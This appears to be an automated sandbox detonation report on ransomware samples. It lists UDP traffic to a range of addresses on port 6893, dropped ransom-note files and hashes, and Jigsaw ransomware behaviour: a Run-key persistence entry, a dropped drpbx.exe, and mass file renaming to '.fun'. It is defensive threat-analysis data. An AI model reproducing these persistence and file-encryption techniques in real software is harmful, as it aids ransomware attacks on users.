FR 178.33.162.46:6893 udp
FR 178.33.162.47:6893 udp
FR 178.33.162.48:6893 udp
FR 178.33.162.49:6893 udp
FR 178.33.162.50:6893 udp
FR 178.33.162.51:6893 udp
FR 178.33.162.52:6893 udp
FR 178.33.162.53:6893 udp
FR 178.33.162.54:6893 udp
FR 178.33.162.55:6893 udp
FR 178.33.162.56:6893 udp
FR 178.33.162.57:6893 udp
FR 178.33.162.58:6893 udp
FR 178.33.162.59:6893 udp
FR 178.33.162.60:6893 udp
FR 178.33.162.61:6893 udp
FR 178.33.162.62:6893 udp
FR 178.33.162.63:6893 udp
FR 178.33.162.64:6893 udp
FR 178.33.162.65:6893 udp
FR 178.33.162.66:6893 udp
FR 178.33.162.67:6893 udp
FR 178.33.162.68:6893 udp
FR 178.33.162.69:6893 udp
FR 178.33.162.70:6893 udp
FR 178.33.162.71:6893 udp
FR 178.33.162.72:6893 udp
FR 178.33.162.73:6893 udp
FR 178.33.162.74:6893 udp
FR 178.33.162.75:6893 udp
FR 178.33.162.76:6893 udp
FR 178.33.162.77:6893 udp
FR 178.33.162.78:6893 udp
FR 178.33.162.79:6893 udp
FR 178.33.162.80:6893 udp
FR 178.33.162.81:6893 udp
FR 178.33.162.82:6893 udp
FR 178.33.162.83:6893 udp
FR 178.33.162.84:6893 udp
FR 178.33.162.85:6893 udp
FR 178.33.162.86:6893 udp
FR 178.33.162.87:6893 udp
FR 178.33.162.88:6893 udp
FR 178.33.162.89:6893 udp
FR 178.33.162.90:6893 udp
FR 178.33.162.91:6893 udp
FR 178.33.162.92:6893 udp
FR 178.33.162.93:6893 udp
FR 178.33.162.94:6893 udp
FR 178.33.162.95:6893 udp
FR 178.33.162.96:6893 udp
FR 178.33.162.97:6893 udp
FR 178.33.162.98:6893 udp
FR 178.33.162.99:6893 udp
FR 178.33.162.100:6893 udp
FR 178.33.162.101:6893 udp
FR 178.33.162.102:6893 udp
FR 178.33.162.103:6893 udp
FR 178.33.162.104:6893 udp
FR 178.33.162.105:6893 udp
FR 178.33.162.106:6893 udp
FR 178.33.162.107:6893 udp
FR 178.33.162.108:6893 udp
FR 178.33.162.109:6893 udp
FR 178.33.162.110:6893 udp
FR 178.33.162.111:6893 udp
FR 178.33.162.112:6893 udp
FR 178.33.162.113:6893 udp
FR 178.33.162.114:6893 udp
FR 178.33.162.115:6893 udp
FR 178.33.162.116:6893 udp
FR 178.33.162.117:6893 udp
FR 178.33.162.118:6893 udp
FR 178.33.162.119:6893 udp
FR 178.33.162.120:6893 udp
FR 178.33.162.121:6893 udp
FR 178.33.162.122:6893 udp
FR 178.33.162.123:6893 udp
FR 178.33.162.124:6893 udp
FR 178.33.162.125:6893 udp
FR 178.33.162.126:6893 udp
FR 178.33.162.127:6893 udp
FR 178.33.162.128:6893 udp
FR 178.33.162.129:6893 udp
FR 178.33.162.130:6893 udp
FR 178.33.162.131:6893 udp
FR 178.33.162.132:6893 udp
FR 178.33.162.133:6893 udp
FR 178.33.162.134:6893 udp
FR 178.33.162.135:6893 udp
FR 178.33.162.136:6893 udp
FR 178.33.162.137:6893 udp
FR 178.33.162.138:6893 udp
FR 178.33.162.139:6893 udp
FR 178.33.162.140:6893 udp
FR 178.33.162.141:6893 udp
FR 178.33.162.142:6893 udp
FR 178.33.162.143:6893 udp
FR 178.33.162.144:6893 udp
FR 178.33.162.145:6893 udp
FR 178.33.162.146:6893 udp
FR 178.33.162.147:6893 udp
FR 178.33.162.148:6893 udp
FR 178.33.162.149:6893 udp
FR 178.33.162.150:6893 udp
FR 178.33.162.151:6893 udp
FR 178.33.162.152:6893 udp
FR 178.33.162.153:6893 udp
FR 178.33.162.154:6893 udp
FR 178.33.162.155:6893 udp
FR 178.33.162.156:6893 udp
FR 178.33.162.157:6893 udp
FR 178.33.162.158:6893 udp
FR 178.33.162.159:6893 udp
FR 178.33.162.160:6893 udp
FR 178.33.162.161:6893 udp
FR 178.33.162.162:6893 udp
FR 178.33.162.163:6893 udp
FR 178.33.162.164:6893 udp
FR 178.33.162.165:6893 udp
FR 178.33.162.166:6893 udp
FR 178.33.162.167:6893 udp
FR 178.33.162.168:6893 udp
FR 178.33.162.169:6893 udp
FR 178.33.162.170:6893 udp
FR 178.33.162.171:6893 udp
FR 178.33.162.172:6893 udp
FR 178.33.162.173:6893 udp
FR 178.33.162.174:6893 udp
FR 178.33.162.175:6893 udp
FR 178.33.162.176:6893 udp
FR 178.33.162.177:6893 udp
FR 178.33.162.178:6893 udp
FR 178.33.162.179:6893 udp
FR 178.33.162.180:6893 udp
FR 178.33.162.181:6893 udp
FR 178.33.162.182:6893 udp
FR 178.33.162.183:6893 udp
FR 178.33.162.184:6893 udp
FR 178.33.162.185:6893 udp
FR 178.33.162.186:6893 udp
FR 178.33.162.187:6893 udp
FR 178.33.162.188:6893 udp
FR 178.33.162.189:6893 udp
FR 178.33.162.190:6893 udp
FR 178.33.162.191:6893 udp
FR 178.33.162.192:6893 udp
FR 178.33.162.193:6893 udp
FR 178.33.162.194:6893 udp
FR 178.33.162.195:6893 udp
FR 178.33.162.196:6893 udp
FR 178.33.162.197:6893 udp
FR 178.33.162.198:6893 udp
FR 178.33.162.199:6893 udp
FR 178.33.162.200:6893 udp
FR 178.33.162.201:6893 udp
FR 178.33.162.202:6893 udp
FR 178.33.162.203:6893 udp
FR 178.33.162.204:6893 udp
FR 178.33.162.205:6893 udp
FR 178.33.162.206:6893 udp
FR 178.33.162.207:6893 udp
FR 178.33.162.208:6893 udp
FR 178.33.162.209:6893 udp
FR 178.33.162.210:6893 udp
FR 178.33.162.211:6893 udp
FR 178.33.162.212:6893 udp
FR 178.33.162.213:6893 udp
FR 178.33.162.214:6893 udp
FR 178.33.162.215:6893 udp
FR 178.33.162.216:6893 udp
FR 178.33.162.217:6893 udp
FR 178.33.162.218:6893 udp
FR 178.33.162.219:6893 udp
FR 178.33.162.220:6893 udp
FR 178.33.162.221:6893 udp
FR 178.33.162.222:6893 udp
FR 178.33.162.223:6893 udp
FR 178.33.162.224:6893 udp
FR 178.33.162.225:6893 udp
FR 178.33.162.226:6893 udp
FR 178.33.162.227:6893 udp
FR 178.33.162.228:6893 udp
FR 178.33.162.229:6893 udp
FR 178.33.162.230:6893 udp
FR 178.33.162.231:6893 udp
FR 178.33.162.232:6893 udp
FR 178.33.162.233:6893 udp
FR 178.33.162.234:6893 udp
FR 178.33.162.235:6893 udp
FR 178.33.162.236:6893 udp
FR 178.33.162.237:6893 udp
FR 178.33.162.238:6893 udp
FR 178.33.162.239:6893 udp
FR 178.33.162.240:6893 udp
FR 178.33.162.241:6893 udp
FR 178.33.162.242:6893 udp
FR 178.33.162.243:6893 udp
FR 178.33.162.244:6893 udp
FR 178.33.162.245:6893 udp
FR 178.33.162.246:6893 udp
FR 178.33.162.247:6893 udp
FR 178.33.162.248:6893 udp
FR 178.33.162.249:6893 udp
FR 178.33.162.250:6893 udp
FR 178.33.162.251:6893 udp
FR 178.33.162.252:6893 udp
FR 178.33.162.253:6893 udp
FR 178.33.162.254:6893 udp
FR 178.33.162.255:6893 udp
FR 178.33.163.0:6893 udp
FR 178.33.163.1:6893 udp
FR 178.33.163.2:6893 udp
FR 178.33.163.3:6893 udp
FR 178.33.163.4:6893 udp
FR 178.33.163.5:6893 udp
FR 178.33.163.6:6893 udp
FR 178.33.163.7:6893 udp
FR 178.33.163.8:6893 udp
FR 178.33.163.9:6893 udp
FR 178.33.163.10:6893 udp
FR 178.33.163.11:6893 udp
FR 178.33.163.12:6893 udp
FR 178.33.163.13:6893 udp
FR 178.33.163.14:6893 udp
FR 178.33.163.15:6893 udp
FR 178.33.163.16:6893 udp
FR 178.33.163.17:6893 udp
FR 178.33.163.18:6893 udp
FR 178.33.163.19:6893 udp
FR 178.33.163.20:6893 udp
FR 178.33.163.21:6893 udp
FR 178.33.163.22:6893 udp
FR 178.33.163.23:6893 udp
FR 178.33.163.24:6893 udp
FR 178.33.163.25:6893 udp
FR 178.33.163.26:6893 udp
FR 178.33.163.27:6893 udp
FR 178.33.163.28:6893 udp
FR 178.33.163.29:6893 udp
FR 178.33.163.30:6893 udp
FR 178.33.163.31:6893 udp
FR 178.33.163.32:6893 udp
FR 178.33.163.33:6893 udp
FR 178.33.163.34:6893 udp
FR 178.33.163.35:6893 udp
FR 178.33.163.36:6893 udp
FR 178.33.163.37:6893 udp
FR 178.33.163.38:6893 udp
FR 178.33.163.39:6893 udp
FR 178.33.163.40:6893 udp
FR 178.33.163.41:6893 udp
FR 178.33.163.42:6893 udp
FR 178.33.163.43:6893 udp
FR 178.33.163.44:6893 udp
FR 178.33.163.45:6893 udp
FR 178.33.163.46:6893 udp
FR 178.33.163.47:6893 udp
FR 178.33.163.48:6893 udp
FR 178.33.163.49:6893 udp
FR 178.33.163.50:6893 udp
FR 178.33.163.51:6893 udp
FR 178.33.163.52:6893 udp
FR 178.33.163.53:6893 udp
FR 178.33.163.54:6893 udp
FR 178.33.163.55:6893 udp
FR 178.33.163.56:6893 udp
FR 178.33.163.57:6893 udp
FR 178.33.163.58:6893 udp
FR 178.33.163.59:6893 udp
FR 178.33.163.60:6893 udp
FR 178.33.163.61:6893 udp
FR 178.33.163.62:6893 udp
FR 178.33.163.63:6893 udp
FR 178.33.163.64:6893 udp
FR 178.33.163.65:6893 udp
FR 178.33.163.66:6893 udp
FR 178.33.163.67:6893 udp
FR 178.33.163.68:6893 udp
FR 178.33.163.69:6893 udp
FR 178.33.163.70:6893 udp
FR 178.33.163.71:6893 udp
FR 178.33.163.72:6893 udp
FR 178.33.163.73:6893 udp
FR 178.33.163.74:6893 udp
FR 178.33.163.75:6893 udp
FR 178.33.163.76:6893 udp
FR 178.33.163.77:6893 udp
FR 178.33.163.78:6893 udp
FR 178.33.163.79:6893 udp
FR 178.33.163.80:6893 udp
FR 178.33.163.81:6893 udp
FR 178.33.163.82:6893 udp
FR 178.33.163.83:6893 udp
FR 178.33.163.84:6893 udp
FR 178.33.163.85:6893 udp
FR 178.33.163.86:6893 udp
FR 178.33.163.87:6893 udp
FR 178.33.163.88:6893 udp
FR 178.33.163.89:6893 udp
FR 178.33.163.90:6893 udp
FR 178.33.163.91:6893 udp
FR 178.33.163.92:6893 udp
FR 178.33.163.93:6893 udp
FR 178.33.163.94:6893 udp
FR 178.33.163.95:6893 udp
FR 178.33.163.96:6893 udp
FR 178.33.163.97:6893 udp
FR 178.33.163.98:6893 udp
FR 178.33.163.99:6893 udp
FR 178.33.163.100:6893 udp
FR 178.33.163.101:6893 udp
FR 178.33.163.102:6893 udp
FR 178.33.163.103:6893 udp
FR 178.33.163.104:6893 udp
FR 178.33.163.105:6893 udp
FR 178.33.163.106:6893 udp
FR 178.33.163.107:6893 udp
FR 178.33.163.108:6893 udp
FR 178.33.163.109:6893 udp
FR 178.33.163.110:6893 udp
FR 178.33.163.111:6893 udp
FR 178.33.163.112:6893 udp
FR 178.33.163.113:6893 udp
FR 178.33.163.114:6893 udp
FR 178.33.163.115:6893 udp
FR 178.33.163.116:6893 udp
FR 178.33.163.117:6893 udp
FR 178.33.163.118:6893 udp
FR 178.33.163.119:6893 udp
FR 178.33.163.120:6893 udp
FR 178.33.163.121:6893 udp
FR 178.33.163.122:6893 udp
FR 178.33.163.123:6893 udp
FR 178.33.163.124:6893 udp
FR 178.33.163.125:6893 udp
FR 178.33.163.126:6893 udp
FR 178.33.163.127:6893 udp
FR 178.33.163.128:6893 udp
FR 178.33.163.129:6893 udp
FR 178.33.163.130:6893 udp
FR 178.33.163.131:6893 udp
FR 178.33.163.132:6893 udp
FR 178.33.163.133:6893 udp
FR 178.33.163.134:6893 udp
FR 178.33.163.135:6893 udp
FR 178.33.163.136:6893 udp
FR 178.33.163.137:6893 udp
FR 178.33.163.138:6893 udp
FR 178.33.163.139:6893 udp
FR 178.33.163.140:6893 udp
FR 178.33.163.141:6893 udp
FR 178.33.163.142:6893 udp
FR 178.33.163.143:6893 udp
FR 178.33.163.144:6893 udp
FR 178.33.163.145:6893 udp
FR 178.33.163.146:6893 udp
FR 178.33.163.147:6893 udp
FR 178.33.163.148:6893 udp
FR 178.33.163.149:6893 udp
FR 178.33.163.150:6893 udp
FR 178.33.163.151:6893 udp
FR 178.33.163.152:6893 udp
FR 178.33.163.153:6893 udp
FR 178.33.163.154:6893 udp
FR 178.33.163.155:6893 udp
FR 178.33.163.156:6893 udp
FR 178.33.163.157:6893 udp
FR 178.33.163.158:6893 udp
FR 178.33.163.159:6893 udp
FR 178.33.163.160:6893 udp
FR 178.33.163.161:6893 udp
FR 178.33.163.162:6893 udp
FR 178.33.163.163:6893 udp
FR 178.33.163.164:6893 udp
FR 178.33.163.165:6893 udp
FR 178.33.163.166:6893 udp
FR 178.33.163.167:6893 udp
FR 178.33.163.168:6893 udp
FR 178.33.163.169:6893 udp
FR 178.33.163.170:6893 udp
FR 178.33.163.171:6893 udp
FR 178.33.163.172:6893 udp
FR 178.33.163.173:6893 udp
FR 178.33.163.174:6893 udp
FR 178.33.163.175:6893 udp
FR 178.33.163.176:6893 udp
FR 178.33.163.177:6893 udp
FR 178.33.163.178:6893 udp
FR 178.33.163.179:6893 udp
FR 178.33.163.180:6893 udp
FR 178.33.163.181:6893 udp
FR 178.33.163.182:6893 udp
FR 178.33.163.183:6893 udp
FR 178.33.163.184:6893 udp
FR 178.33.163.185:6893 udp
FR 178.33.163.186:6893 udp
FR 178.33.163.187:6893 udp
FR 178.33.163.188:6893 udp
FR 178.33.163.189:6893 udp
FR 178.33.163.190:6893 udp
FR 178.33.163.191:6893 udp
FR 178.33.163.192:6893 udp
FR 178.33.163.193:6893 udp
FR 178.33.163.194:6893 udp
FR 178.33.163.195:6893 udp
FR 178.33.163.196:6893 udp
FR 178.33.163.197:6893 udp
FR 178.33.163.198:6893 udp
FR 178.33.163.199:6893 udp
FR 178.33.163.200:6893 udp
FR 178.33.163.201:6893 udp
FR 178.33.163.202:6893 udp
FR 178.33.163.203:6893 udp
FR 178.33.163.204:6893 udp
FR 178.33.163.205:6893 udp
FR 178.33.163.206:6893 udp
FR 178.33.163.207:6893 udp
FR 178.33.163.208:6893 udp
FR 178.33.163.209:6893 udp
FR 178.33.163.210:6893 udp
FR 178.33.163.211:6893 udp
FR 178.33.163.212:6893 udp
FR 178.33.163.213:6893 udp
FR 178.33.163.214:6893 udp
FR 178.33.163.215:6893 udp
FR 178.33.163.216:6893 udp
FR 178.33.163.217:6893 udp
FR 178.33.163.218:6893 udp
FR 178.33.163.219:6893 udp
FR 178.33.163.220:6893 udp
FR 178.33.163.221:6893 udp
FR 178.33.163.222:6893 udp
FR 178.33.163.223:6893 udp
FR 178.33.163.224:6893 udp
FR 178.33.163.225:6893 udp
FR 178.33.163.226:6893 udp
FR 178.33.163.227:6893 udp
FR 178.33.163.228:6893 udp
FR 178.33.163.229:6893 udp
FR 178.33.163.230:6893 udp
FR 178.33.163.231:6893 udp
FR 178.33.163.232:6893 udp
FR 178.33.163.233:6893 udp
FR 178.33.163.234:6893 udp
FR 178.33.163.235:6893 udp
FR 178.33.163.236:6893 udp
FR 178.33.163.237:6893 udp
FR 178.33.163.238:6893 udp
FR 178.33.163.239:6893 udp
FR 178.33.163.240:6893 udp
FR 178.33.163.241:6893 udp
FR 178.33.163.242:6893 udp
FR 178.33.163.243:6893 udp
FR 178.33.163.244:6893 udp
FR 178.33.163.245:6893 udp
FR 178.33.163.246:6893 udp
FR 178.33.163.247:6893 udp
FR 178.33.163.248:6893 udp
FR 178.33.163.249:6893 udp
FR 178.33.163.250:6893 udp
FR 178.33.163.251:6893 udp
FR 178.33.163.252:6893 udp
FR 178.33.163.253:6893 udp
FR 178.33.163.254:6893 udp
FR 178.33.163.255:6893 udp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp

Files

memory/4052-1-0x0000000000400000-0x0000000000435000-memory.dmp

memory/4052-0-0x0000000002200000-0x0000000002231000-memory.dmp

memory/4052-2-0x0000000000400000-0x0000000000435000-memory.dmp

memory/4052-4-0x0000000000400000-0x0000000000435000-memory.dmp

memory/4052-7-0x0000000000400000-0x0000000000435000-memory.dmp

memory/4052-9-0x0000000000400000-0x0000000000435000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\_R_E_A_D___T_H_I_S___SBY0RF1W_.txt

MD5 e6876e3bfcacbf038d67515b3e0bf014
SHA1 736db64e0be634d2b60007bb959c17b04a30990b
SHA256 b972ac1bed08d2cc4a0ba5707c595f75d959cb7345831492fbd1d8b3faf298b1
SHA512 9024d74b2bc7cd4e6b785170203965c3b04a51f4a883e6a9c546cca08b78fe5bce7bf8ba3aef11288dc2a7ce15d0c43341d007bd35e4844104ed1d5b3071b026

C:\Users\Admin\AppData\Roaming\Microsoft\OneNote\16.0\_R_E_A_D___T_H_I_S___67EK9_.hta

MD5 acfe84d804976da05338f1804e7f5b8d
SHA1 ace378193957309cf20849ea246633b6907cc975
SHA256 d0f6e4840e0f8b8a306a0a62d9743de62821f73f8f6303ec33e5934146a7b2e0
SHA512 02ef68d4dbc4ab3f2ed4cc69657ae417b70f63c756f014100dc3ce2471e76b693e0d54d139e0f83e803f74602906a1e4848d118cf406686c25eab14f045ad300

memory/4052-383-0x0000000000400000-0x0000000000435000-memory.dmp

memory/4052-404-0x0000000000400000-0x0000000000435000-memory.dmp

memory/4052-405-0x0000000000440000-0x0000000000451000-memory.dmp

Analysis: behavioral5

Detonation Overview

Submitted

2024-11-26 15:24

Reported

2024-11-26 15:25

Platform

win7-20241023-en

Max time kernel

36s

Max time network

17s

Command Line

"C:\Users\Admin\AppData\Local\Temp\jigsaw.exe"

Signatures

Jigsaw Ransomware

ransomware jigsaw

Jigsaw family

jigsaw

Renames multiple (594) files with added filename extension

ransomware

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Local\Temp\jigsaw.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_corner_top_left.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\Shared24x24ImagesMask.bmp.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\images\add_up.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\Microsoft Office\Office14\1033\Mso Example Intl Setup File A.txt C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\icon.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_right_rest.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\2.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Vignette\whiteband.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\bg_Premium.gif.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Templates\1033\BlackTieLetter.dotx.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\travel.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\8.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-waning-gibbous_partly-cloudy.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files\EnableInvoke.ppt.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\private_browsing.VisualElementsManifest.xml C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files\7-Zip\Lang\lv.txt.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\WinFXList.xml.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\fr-FR\gadget.xml C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\46.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files\MoveSet.potm.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files\7-Zip\Lang\gl.txt.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\images\calendar_single_orange.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-full_partly-cloudy.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-waning-gibbous.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\35.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\is.txt C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\Windows Media Player\Media Renderer\connectionmanager_dmr.xml C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\nl.txt C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\Windows NT\TableTextService\TableTextServiceYi.txt C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\it-IT\gadget.xml C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-new.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_gray_thunderstorm.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\novelty_h.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\sw.txt C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Templates\1033\ApothecaryNewsletter.dotx.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_gray_foggy.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\images\prev_rest.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_blue_partly-cloudy.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\images\combo-hover-middle.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Equity.xml C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyMainToScenesBackground.wmv C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\plugins\access\libbluray-j2se-1.3.2.jar C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_divider_right.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\16-on-black.gif C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\14.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files\7-Zip\Lang\an.txt.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\Windows Media Player\Network Sharing\wmpnss_color48.bmp C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\icon.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_corner_bottom_right.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\ja-JP\gadget.xml C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\ipsita.xml C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Clarity.xml C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\lib\javafx-doclet.jar.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\btn-previous-static.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\es-ES\gadget.xml C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\fr-FR\gadget.xml C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\ast.txt C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\hwrcommonlm.dat C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\images\reveal_rest.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\br.txt C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\Alphabet.xml C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Trek.xml.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_corner_bottom_left.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A

Enumerates physical storage devices

Processes

C:\Users\Admin\AppData\Local\Temp\jigsaw.exe

"C:\Users\Admin\AppData\Local\Temp\jigsaw.exe"

C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe

"C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe" C:\Users\Admin\AppData\Local\Temp\jigsaw.exe

Network

N/A

Files

memory/1800-0-0x000007FEF616E000-0x000007FEF616F000-memory.dmp

memory/1800-1-0x00000000005B0000-0x00000000005E8000-memory.dmp

memory/1800-5-0x000007FEF5EB0000-0x000007FEF684D000-memory.dmp

C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe

MD5 2773e3dc59472296cb0024ba7715a64e
SHA1 27d99fbca067f478bb91cdbcb92f13a828b00859
SHA256 3ae96f73d805e1d3995253db4d910300d8442ea603737a1428b613061e7f61e7
SHA512 6ef530b209f8ec459cca66dbf2c31ec96c5f7d609f17fa3b877d276968032fbc6132ea4a45ed1450fb6c5d730a7c9349bf4481e28befaea6b119ec0ded842262

